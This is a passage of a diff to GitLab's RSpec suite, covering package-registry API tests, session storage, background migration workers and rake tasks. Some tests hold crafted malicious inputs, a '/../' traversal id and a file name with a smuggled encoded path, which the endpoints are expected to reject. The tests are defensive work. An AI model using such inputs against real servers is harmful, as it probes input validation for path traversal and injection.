deep_nested_group_2.id) } + end end describe '.self_and_descendant_ids' do diff --git a/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb index e45be21f152..9f4fdcf7ba1 100644 --- a/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb @@ -173,3 +173,65 @@ RSpec.shared_examples 'rejects Composer access with unknown project id' do end end 
end + +RSpec.shared_examples 'Composer access with deploy tokens' do + shared_examples 'a deploy token for Composer GET requests' do + context 'with deploy token headers' do + let(:headers) { basic_auth_header(deploy_token.username, deploy_token.token) } + + before do + group.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + context 'valid token' do + it_behaves_like 'returning response status', :success + end + + context 'invalid token' do + let(:headers) { basic_auth_header(deploy_token.username, 'bar') } + + it_behaves_like 'returning response status', :not_found + end + end + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_group } + + it_behaves_like 'a deploy token for Composer GET requests' + end + + context 'project deploy token' do + let(:deploy_token) { deploy_token_for_project } + + it_behaves_like 'a deploy token for Composer GET requests' + end +end + +RSpec.shared_examples 'Composer publish with deploy tokens' do + shared_examples 'a deploy token for Composer publish requests' do + let(:headers) { basic_auth_header(deploy_token.username, deploy_token.token) } + + context 'valid token' do + it_behaves_like 'returning response status', :success + end + + context 'invalid token' do + let(:headers) { basic_auth_header(deploy_token.username, 'bar') } + + it_behaves_like 'returning response status', :unauthorized + end + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_group } + + it_behaves_like 'a deploy token for Composer publish requests' + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_project } + + it_behaves_like 'a deploy token for Composer publish requests' + end +end diff --git a/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb index 20606ae942d..71f3a0235be 100644 --- 
a/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb @@ -178,6 +178,54 @@ RSpec.shared_examples 'rejects invalid recipe' do end end +RSpec.shared_examples 'handling empty values for username and channel' do + using RSpec::Parameterized::TableSyntax + + let(:recipe_path) { "#{package.name}/#{package.version}/#{package_username}/#{channel}" } + + where(:username, :channel, :status) do + 'username' | 'channel' | :ok + 'username' | '_' | :bad_request + '_' | 'channel' | :bad_request_or_not_found + '_' | '_' | :ok_or_not_found + end + + with_them do + let(:package_username) do + if username == 'username' + package.conan_metadatum.package_username + else + username + end + end + + before do + project.add_maintainer(user) # avoid any permission issue + end + + it 'returns the correct status code' do |example| + project_level = example.full_description.include?('api/v4/projects') + + expected_status = case status + when :ok_or_not_found + project_level ? :ok : :not_found + when :bad_request_or_not_found + project_level ? 
:bad_request : :not_found + else + status + end + + if expected_status == :ok + package.conan_metadatum.update!(package_username: package_username, package_channel: channel) + end + + subject + + expect(response).to have_gitlab_http_status(expected_status) + end + end +end + RSpec.shared_examples 'rejects invalid file_name' do |invalid_file_name| let(:file_name) { invalid_file_name } @@ -300,6 +348,7 @@ RSpec.shared_examples 'recipe snapshot endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'empty recipe for not found package' + it_behaves_like 'handling empty values for username and channel' context 'with existing package' do it 'returns a hash of files with their md5 hashes' do @@ -324,6 +373,7 @@ RSpec.shared_examples 'package snapshot endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'empty recipe for not found package' + it_behaves_like 'handling empty values for username and channel' context 'with existing package' do it 'returns a hash of md5 values for the files' do @@ -344,12 +394,14 @@ RSpec.shared_examples 'recipe download_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'recipe download_urls' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'package download_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'package download_urls' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'recipe upload_urls endpoint' do @@ -362,6 +414,7 @@ RSpec.shared_examples 'recipe upload_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid upload_url params' + it_behaves_like 'handling empty values for username and channel' it 'returns a set of upload 
urls for the files requested' do subject @@ -423,6 +476,7 @@ RSpec.shared_examples 'package upload_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid upload_url params' + it_behaves_like 'handling empty values for username and channel' it 'returns a set of upload urls for the files requested' do expected_response = { @@ -458,6 +512,7 @@ RSpec.shared_examples 'delete package endpoint' do let(:recipe_path) { package.conan_recipe_path } it_behaves_like 'rejects invalid recipe' + it_behaves_like 'handling empty values for username and channel' it 'returns unauthorized for users without valid permission' do subject @@ -568,12 +623,14 @@ RSpec.shared_examples 'recipe file download endpoint' do it_behaves_like 'a public project with packages' it_behaves_like 'an internal project with packages' it_behaves_like 'a private project with packages' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'package file download endpoint' do it_behaves_like 'a public project with packages' it_behaves_like 'an internal project with packages' it_behaves_like 'a private project with packages' + it_behaves_like 'handling empty values for username and channel' context 'tracking the conan_package.tgz download' do let(:package_file) { package.package_files.find_by(file_name: ::Packages::Conan::FileMetadatum::PACKAGE_BINARY) } @@ -598,6 +655,7 @@ RSpec.shared_examples 'workhorse authorize endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid file_name', 'conanfile.py.git%2fgit-upload-pack' it_behaves_like 'workhorse authorization' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'workhorse recipe file upload endpoint' do @@ -619,6 +677,7 @@ RSpec.shared_examples 'workhorse recipe file upload endpoint' do it_behaves_like 'rejects invalid file_name', 'conanfile.py.git%2fgit-upload-pack' it_behaves_like 'uploads a package file' 
it_behaves_like 'creates build_info when there is a job' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'workhorse package file upload endpoint' do @@ -640,6 +699,7 @@ RSpec.shared_examples 'workhorse package file upload endpoint' do it_behaves_like 'rejects invalid file_name', 'conaninfo.txttest' it_behaves_like 'uploads a package file' it_behaves_like 'creates build_info when there is a job' + it_behaves_like 'handling empty values for username and channel' context 'tracking the conan_package.tgz upload' do let(:file_name) { ::Packages::Conan::FileMetadatum::PACKAGE_BINARY } diff --git a/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb b/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb index 62dbac3fd4d..8bffd1f71e9 100644 --- a/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb @@ -18,19 +18,19 @@ RSpec.shared_examples 'snippet edit usage data counters' do end end - context 'when user is not sessionless' do + context 'when user is not sessionless', :clean_gitlab_redis_sessions do before do session_id = Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') session_hash = { 'warden.user.user.key' => [[current_user.id], current_user.encrypted_password[0, 29]] } - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end cookies[Gitlab::Application.config.session_options[:key]] = session_id.public_id end - it 'tracks usage data actions', :clean_gitlab_redis_shared_state do + it 'tracks usage data actions', :clean_gitlab_redis_sessions do expect(::Gitlab::UsageDataCounters::EditorUniqueCounter).to receive(:track_snippet_editor_edit_action) post_graphql_mutation(mutation) diff --git 
a/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb b/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb index 367c6d4fa3a..882c79cb03f 100644 --- a/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb @@ -55,7 +55,7 @@ RSpec.shared_examples 'group and project packages query' do end it 'deals with metadata' do - expect(target_shas).to contain_exactly(composer_metadatum.target_sha) + expect(target_shas.compact).to contain_exactly(composer_metadatum.target_sha) end it 'returns the count of the packages' do diff --git a/spec/support/shared_examples/requests/api/issuable_participants_examples.rb b/spec/support/shared_examples/requests/api/issuable_participants_examples.rb index 673d7741017..c5e5803c0a7 100644 --- a/spec/support/shared_examples/requests/api/issuable_participants_examples.rb +++ b/spec/support/shared_examples/requests/api/issuable_participants_examples.rb @@ -28,4 +28,34 @@ RSpec.shared_examples 'issuable participants endpoint' do expect(response).to have_gitlab_http_status(:not_found) end + + context 'with a confidential note' do + let!(:note) do + create( + :note, + :confidential, + project: project, + noteable: entity, + author: create(:user) + ) + end + + it 'returns a full list of participants' do + get api("/projects/#{project.id}/#{area}/#{entity.iid}/participants", user) + + expect(response).to have_gitlab_http_status(:ok) + participant_ids = json_response.map { |el| el['id'] } + expect(participant_ids).to match_array([entity.author_id, note.author_id]) + end + + context 'when user cannot see a confidential note' do + it 'returns a limited list of participants' do + get api("/projects/#{project.id}/#{area}/#{entity.iid}/participants", create(:user)) + + 
expect(response).to have_gitlab_http_status(:ok) + participant_ids = json_response.map { |el| el['id'] } + expect(participant_ids).to match_array([entity.author_id]) + end + end + end end diff --git a/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb index 19677e92001..8d6d85732be 100644 --- a/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb @@ -41,19 +41,6 @@ RSpec.shared_examples 'handling get metadata requests' do |scope: :project| # query count can slightly change between the examples so we're using a custom threshold expect { get(url, headers: headers) }.not_to exceed_query_limit(control).with_threshold(4) end - - context 'with packages_npm_abbreviated_metadata disabled' do - before do - stub_feature_flags(packages_npm_abbreviated_metadata: false) - end - - it 'calls the presenter without including metadata' do - expect(::Packages::Npm::PackagePresenter) - .to receive(:new).with(anything, anything, include_metadata: false).and_call_original - - subject - end - end end shared_examples 'reject metadata request' do |status:| diff --git a/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb index 878cbc10a24..6568d51b90e 100644 --- a/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb @@ -391,7 +391,7 @@ RSpec.shared_examples 'rejects nuget access with invalid target id' do context 'with a target id with invalid integers' do using RSpec::Parameterized::TableSyntax - let(:target) { OpenStruct.new(id: id) } + let(:target) { double(id: id) } where(:id, :status) do '/../' | :bad_request @@ -411,7 +411,7 @@ end RSpec.shared_examples 'rejects nuget access with 
unknown target id' do context 'with an unknown target' do - let(:target) { OpenStruct.new(id: 1234567890) } + let(:target) { double(id: 1234567890) } context 'as anonymous' do it_behaves_like 'rejects nuget packages access', :anonymous, :unauthorized diff --git a/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb index 06c51add438..aff086d1ba3 100644 --- a/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb @@ -346,7 +346,8 @@ RSpec.shared_examples 'a pypi user namespace endpoint' do end with_them do - let_it_be_with_reload(:group) { create(:namespace) } + # only groups are supported, so this "group" is actually the wrong namespace type + let_it_be_with_reload(:group) { create(:user_namespace) } let(:headers) { user_role == :anonymous ? {} : basic_auth_header(user.username, personal_access_token.token) } before do diff --git a/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb b/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb index c979fdc2bb0..7fd20fc3909 100644 --- a/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb +++ b/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb @@ -126,7 +126,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do SHA256: #{package_files[4].file_sha256} EOF - expected_main_source_content = <<~EOF + expected_main_sources_content = <<~EOF Package: #{package.name} Binary: sample-dev, libsample0, sample-udeb Version: #{package.version} @@ -158,7 +158,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do check_component_file(current_time.round, 'main', :di_packages, 'amd64', expected_main_amd64_di_content) 
check_component_file(current_time.round, 'main', :di_packages, 'arm64', nil) - check_component_file(current_time.round, 'main', :source, nil, expected_main_source_content) + check_component_file(current_time.round, 'main', :sources, nil, expected_main_sources_content) check_component_file(current_time.round, 'contrib', :packages, 'all', nil) check_component_file(current_time.round, 'contrib', :packages, 'amd64', nil) @@ -168,7 +168,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do check_component_file(current_time.round, 'contrib', :di_packages, 'amd64', nil) check_component_file(current_time.round, 'contrib', :di_packages, 'arm64', nil) - check_component_file(current_time.round, 'contrib', :source, nil, nil) + check_component_file(current_time.round, 'contrib', :sources, nil, nil) main_amd64_size = expected_main_amd64_content.length main_amd64_md5sum = Digest::MD5.hexdigest(expected_main_amd64_content) @@ -182,9 +182,9 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do main_amd64_di_md5sum = Digest::MD5.hexdigest(expected_main_amd64_di_content) main_amd64_di_sha256 = Digest::SHA256.hexdigest(expected_main_amd64_di_content) - main_source_size = expected_main_source_content.length - main_source_md5sum = Digest::MD5.hexdigest(expected_main_source_content) - main_source_sha256 = Digest::SHA256.hexdigest(expected_main_source_content) + main_sources_size = expected_main_sources_content.length + main_sources_md5sum = Digest::MD5.hexdigest(expected_main_sources_content) + main_sources_sha256 = Digest::SHA256.hexdigest(expected_main_sources_content) expected_release_content = <<~EOF Codename: unstable @@ -199,14 +199,14 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do d41d8cd98f00b204e9800998ecf8427e 0 contrib/debian-installer/binary-amd64/Packages d41d8cd98f00b204e9800998ecf8427e 0 contrib/binary-arm64/Packages d41d8cd98f00b204e9800998ecf8427e 0 
contrib/debian-installer/binary-arm64/Packages - d41d8cd98f00b204e9800998ecf8427e 0 contrib/source/Source + d41d8cd98f00b204e9800998ecf8427e 0 contrib/source/Sources d41d8cd98f00b204e9800998ecf8427e 0 main/binary-all/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/debian-installer/binary-all/Packages #{main_amd64_md5sum} #{main_amd64_size} main/binary-amd64/Packages #{main_amd64_di_md5sum} #{main_amd64_di_size} main/debian-installer/binary-amd64/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/binary-arm64/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/debian-installer/binary-arm64/Packages - #{main_source_md5sum} #{main_source_size} main/source/Source + #{main_sources_md5sum} #{main_sources_size} main/source/Sources SHA256: #{contrib_all_sha256} #{contrib_all_size} contrib/binary-all/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-all/Packages @@ -214,14 +214,14 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-amd64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/binary-arm64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-arm64/Packages - e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/source/Source + e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/source/Sources e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/binary-all/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-all/Packages #{main_amd64_sha256} #{main_amd64_size} main/binary-amd64/Packages #{main_amd64_di_sha256} #{main_amd64_di_size} main/debian-installer/binary-amd64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/binary-arm64/Packages 
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-arm64/Packages - #{main_source_sha256} #{main_source_size} main/source/Source + #{main_sources_sha256} #{main_sources_size} main/source/Sources EOF check_release_files(expected_release_content) diff --git a/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb b/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb new file mode 100644 index 00000000000..0d3e158d358 --- /dev/null +++ b/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb @@ -0,0 +1,212 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'it runs background migration jobs' do |tracking_database, metric_name| + describe 'defining the job attributes' do + it 'defines the data_consistency as always' do + expect(described_class.get_data_consistency).to eq(:always) + end + + it 'defines the retry count in sidekiq_options' do + expect(described_class.sidekiq_options['retry']).to eq(3) + end + + it 'defines the feature_category as database' do + expect(described_class.get_feature_category).to eq(:database) + end + + it 'defines the urgency as throttled' do + expect(described_class.get_urgency).to eq(:throttled) + end + + it 'defines the loggable_arguments' do + expect(described_class.loggable_arguments).to match_array([0, 1]) + end + end + + describe '.tracking_database' do + it 'does not raise an error' do + expect { described_class.tracking_database }.not_to raise_error + end + + it 'overrides the method to return the tracking database' do + expect(described_class.tracking_database).to eq(tracking_database) + end + end + + describe '.unhealthy_metric_name' do + it 'does not raise an error' do + expect { described_class.unhealthy_metric_name }.not_to raise_error + end + + it 'overrides the method to return the unhealthy metric name' do + expect(described_class.unhealthy_metric_name).to eq(metric_name) + end + end + 
+ describe '.minimum_interval' do + it 'returns 2 minutes' do + expect(described_class.minimum_interval).to eq(2.minutes.to_i) + end + end + + describe '#perform' do + let(:worker) { described_class.new } + + before do + allow(worker).to receive(:jid).and_return(1) + allow(worker).to receive(:always_perform?).and_return(false) + + allow(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(false) + end + + it 'performs jobs using the coordinator for the worker' do + expect_next_instance_of(Gitlab::BackgroundMigration::JobCoordinator) do |coordinator| + allow(coordinator).to receive(:with_shared_connection).and_yield + + expect(coordinator.worker_class).to eq(described_class) + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + end + + worker.perform('Foo', [10, 20]) + end + + context 'when lease can be obtained' do + let(:coordinator) { double('job coordinator') } + + before do + allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) + .with(tracking_database) + .and_return(coordinator) + + allow(coordinator).to receive(:with_shared_connection).and_yield + end + + it 'sets up the shared connection before checking replication' do + expect(coordinator).to receive(:with_shared_connection).and_yield.ordered + expect(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(false).ordered + + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20]) + end + + it 'performs a background migration' do + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20]) + end + + context 'when lease_attempts is 1' do + it 'performs a background migration' do + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20], 1) + end + end + + it 'can run scheduled job and retried job concurrently' do + expect(coordinator) + .to receive(:perform) + .with('Foo', [10, 20]) + .exactly(2).time + + worker.perform('Foo', 
[10, 20]) + worker.perform('Foo', [10, 20], described_class::MAX_LEASE_ATTEMPTS - 1) + end + + it 'sets the class that will be executed as the caller_id' do + expect(coordinator).to receive(:perform) do + expect(Gitlab::ApplicationContext.current).to include('meta.caller_id' => 'Foo') + end + + worker.perform('Foo', [10, 20]) + end + end + + context 'when lease not obtained (migration of same class was performed recently)' do + let(:timeout) { described_class.minimum_interval } + let(:lease_key) { "#{described_class.name}:Foo" } + let(:coordinator) { double('job coordinator') } + + before do + allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) + .with(tracking_database) + .and_return(coordinator) + + allow(coordinator).to receive(:with_shared_connection).and_yield + + expect(coordinator).not_to receive(:perform) + + Gitlab::ExclusiveLease.new(lease_key, timeout: timeout).try_obtain + end + + it 'reschedules the migration and decrements the lease_attempts' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) + + worker.perform('Foo', [10, 20], 5) + end + + context 'when lease_attempts is 1' do + let(:lease_key) { "#{described_class.name}:Foo:retried" } + + it 'reschedules the migration and decrements the lease_attempts' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 0) + + worker.perform('Foo', [10, 20], 1) + end + end + + context 'when lease_attempts is 0' do + let(:lease_key) { "#{described_class.name}:Foo:retried" } + + it 'gives up performing the migration' do + expect(described_class).not_to receive(:perform_in) + expect(Sidekiq.logger).to receive(:warn).with( + class: 'Foo', + message: 'Job could not get an exclusive lease after several tries. 
Giving up.', + job_id: 1) + + worker.perform('Foo', [10, 20], 0) + end + end + end + + context 'when database is not healthy' do + before do + expect(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(true) + end + + it 'reschedules a migration if the database is not healthy' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) + + worker.perform('Foo', [10, 20]) + end + + it 'increments the unhealthy counter' do + counter = Gitlab::Metrics.counter(metric_name, 'msg') + + expect(described_class).to receive(:perform_in) + + expect { worker.perform('Foo', [10, 20]) }.to change { counter.get }.by(1) + end + + context 'when lease_attempts is 0' do + it 'gives up performing the migration' do + expect(described_class).not_to receive(:perform_in) + expect(Sidekiq.logger).to receive(:warn).with( + class: 'Foo', + message: 'Database was unhealthy after several tries. Giving up.', + job_id: 1) + + worker.perform('Foo', [10, 20], 0) + end + end + end + end +end diff --git a/spec/support_specs/database/multiple_databases_spec.rb b/spec/support_specs/database/multiple_databases_spec.rb index 10d1a8277c6..a8692e315fe 100644 --- a/spec/support_specs/database/multiple_databases_spec.rb +++ b/spec/support_specs/database/multiple_databases_spec.rb @@ -56,4 +56,43 @@ RSpec.describe 'Database::MultipleDatabases' do end end end + + describe '.with_added_ci_connection' do + context 'when only a single database is setup' do + before do + skip_if_multiple_databases_are_setup + end + + it 'connects Ci::ApplicationRecord to the main database for the duration of the block', :aggregate_failures do + main_database = current_database(ActiveRecord::Base) + original_database = current_database(Ci::ApplicationRecord) + + with_added_ci_connection do + expect(current_database(Ci::ApplicationRecord)).to eq(main_database) + end + + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + end + + context 'when 
multiple databases are setup' do + before do + skip_if_multiple_databases_not_setup + end + + it 'does not mock the original Ci::ApplicationRecord connection', :aggregate_failures do + original_database = current_database(Ci::ApplicationRecord) + + with_added_ci_connection do + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + end + + def current_database(connection_class) + connection_class.retrieve_connection.execute('select current_database()').first + end + end end diff --git a/spec/support_specs/database/prevent_cross_joins_spec.rb b/spec/support_specs/database/prevent_cross_joins_spec.rb index 0fbcd190c2c..efeabd15b58 100644 --- a/spec/support_specs/database/prevent_cross_joins_spec.rb +++ b/spec/support_specs/database/prevent_cross_joins_spec.rb @@ -39,6 +39,15 @@ RSpec.describe Database::PreventCrossJoins do expect { main_and_ci_query_allowlist_nested }.not_to raise_error end end + + context 'when there is a parser error' do + it 'does not raise parse PGQuery::ParseError' do + # Since this is in an invalid query it still raises from ActiveRecord + # but this tests that we rescue the PGQuery::ParseError which would + # have otherwise raised first + expect { ApplicationRecord.connection.execute('SELECT SELECT FROM SELECT') }.to raise_error(ActiveRecord::StatementInvalid) + end + end end end diff --git a/spec/support_specs/helpers/graphql_helpers_spec.rb b/spec/support_specs/helpers/graphql_helpers_spec.rb index a9fe5b8d196..fae29ec32f5 100644 --- a/spec/support_specs/helpers/graphql_helpers_spec.rb +++ b/spec/support_specs/helpers/graphql_helpers_spec.rb @@ -43,6 +43,21 @@ RSpec.describe GraphqlHelpers do expect(graphql_dig_at(data, :foo, :nodes, :bar, :nodes, :id)).to eq([1, 2, 3, 4]) end + + it 'does not omit nils at the leaves' do + data = { + 'foo' => { + 'nodes' => [ + { 'bar' => { 'nodes' => [{ 'id' => nil }, { 'id' => 2 }] } }, + { 'bar' => 
{ 'nodes' => [{ 'id' => 3 }, { 'id' => nil }] } }, + { 'bar' => nil } + ] + }, + 'irrelevant' => 'the field is a red-herring' + } + + expect(graphql_dig_at(data, :foo, :nodes, :bar, :nodes, :id)).to eq([nil, 2, 3, nil]) + end end describe 'var' do diff --git a/spec/tasks/gitlab/background_migrations_rake_spec.rb b/spec/tasks/gitlab/background_migrations_rake_spec.rb new file mode 100644 index 00000000000..079b4d3aea8 --- /dev/null +++ b/spec/tasks/gitlab/background_migrations_rake_spec.rb @@ -0,0 +1,49 @@ +# frozen_string_literal: true + +require 'rake_helper' + +RSpec.describe 'gitlab:background_migrations namespace rake tasks' do + before do + Rake.application.rake_require 'tasks/gitlab/background_migrations' + end + + describe 'finalize' do + subject(:finalize_task) { run_rake_task('gitlab:background_migrations:finalize', *arguments) } + + context 'without the proper arguments' do + let(:arguments) { %w[CopyColumnUsingBackgroundMigrationJob events id] } + + it 'exits without finalizing the migration' do + expect(Gitlab::Database::BackgroundMigration::BatchedMigrationRunner).not_to receive(:finalize) + + expect { finalize_task }.to output(/Must specify job_arguments as an argument/).to_stdout + .and raise_error(SystemExit) { |error| expect(error.status).to eq(1) } + end + end + + context 'with the proper arguments' do + let(:arguments) { %w[CopyColumnUsingBackgroundMigrationJob events id [["id1"\,"id2"]]] } + + it 'finalizes the matching migration' do + expect(Gitlab::Database::BackgroundMigration::BatchedMigrationRunner).to receive(:finalize) + .with('CopyColumnUsingBackgroundMigrationJob', 'events', 'id', [%w[id1 id2]]) + + expect { finalize_task }.to output(/Done/).to_stdout + end + end + end + + describe 'status' do + subject(:status_task) { run_rake_task('gitlab:background_migrations:status') } + + it 'outputs the status of background migrations' do + migration1 = create(:batched_background_migration, :finished, job_arguments: [%w[id1 id2]]) + migration2 = 
create(:batched_background_migration, :failed, job_arguments: []) + + expect { status_task }.to output(<<~OUTPUT).to_stdout + finished | #{migration1.job_class_name},#{migration1.table_name},#{migration1.column_name},[["id1","id2"]] + failed | #{migration2.job_class_name},#{migration2.table_name},#{migration2.column_name},[] + OUTPUT + end + end +end diff --git a/spec/tasks/gitlab/cleanup_rake_spec.rb b/spec/tasks/gitlab/cleanup_rake_spec.rb index 16c907ca87c..bd4d9643433 100644 --- a/spec/tasks/gitlab/cleanup_rake_spec.rb +++ b/spec/tasks/gitlab/cleanup_rake_spec.rb @@ -166,17 +166,17 @@ RSpec.describe 'gitlab:cleanup rake tasks', :silence_stdout do end context 'sessions' do - describe 'gitlab:cleanup:sessions:active_sessions_lookup_keys', :clean_gitlab_redis_shared_state do + describe 'gitlab:cleanup:sessions:active_sessions_lookup_keys', :clean_gitlab_redis_sessions do subject(:rake_task) { run_rake_task('gitlab:cleanup:sessions:active_sessions_lookup_keys') } let!(:user) { create(:user) } let(:existing_session_id) { '5' } before do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:#{existing_session_id}", - Marshal.dump(true)) - redis.sadd("session:lookup:user:gitlab:#{user.id}", (1..10).to_a) + Gitlab::Redis::Sessions.with do |redis| + redis.set(ActiveSession.key_name(user.id, existing_session_id), + ActiveSession.new(session_id: 'x').dump) + redis.sadd(ActiveSession.lookup_key_name(user.id), (1..10).to_a) end end @@ -185,11 +185,11 @@ RSpec.describe 'gitlab:cleanup rake tasks', :silence_stdout do end it 'removes expired active session lookup keys' do - Gitlab::Redis::SharedState.with do |redis| - lookup_key = "session:lookup:user:gitlab:#{user.id}" + Gitlab::Redis::Sessions.with do |redis| + lookup_key = ActiveSession.lookup_key_name(user.id) + expect { subject }.to change { redis.scard(lookup_key) }.from(10).to(1) - expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to( - eql([existing_session_id])) + 
expect(redis.smembers(lookup_key)).to contain_exactly existing_session_id end end end diff --git a/spec/tasks/gitlab/db_rake_spec.rb b/spec/tasks/gitlab/db_rake_spec.rb index 38392f77307..830d0dded2e 100644 --- a/spec/tasks/gitlab/db_rake_spec.rb +++ b/spec/tasks/gitlab/db_rake_spec.rb @@ -138,6 +138,10 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do stub_file_read(structure_file, content: input) allow(File).to receive(:open).with(structure_file.to_s, any_args).and_yield(output) end + + if Gitlab.ee? + allow(File).to receive(:open).with(Rails.root.join(Gitlab::Database::GEO_DATABASE_DIR, 'structure.sql').to_s, any_args).and_yield(output) + end end after do @@ -191,7 +195,7 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do it 'drops extra schemas' do Gitlab::Database::EXTRA_SCHEMAS.each do |schema| - expect(connection).to receive(:execute).with("DROP SCHEMA IF EXISTS \"#{schema}\"") + expect(connection).to receive(:execute).with("DROP SCHEMA IF EXISTS \"#{schema}\" CASCADE") end subject @@ -199,43 +203,38 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do end describe 'reindex' do - let(:reindex) { double('reindex') } - let(:indexes) { double('indexes') } - let(:databases) { Gitlab::Database.database_base_models } - let(:databases_count) { databases.count } - - it 'cleans up any leftover indexes' do - expect(Gitlab::Database::Reindexing).to receive(:cleanup_leftovers!).exactly(databases_count).times + it 'delegates to Gitlab::Database::Reindexing' do + expect(Gitlab::Database::Reindexing).to receive(:invoke) run_rake_task('gitlab:db:reindex') end - context 'when async 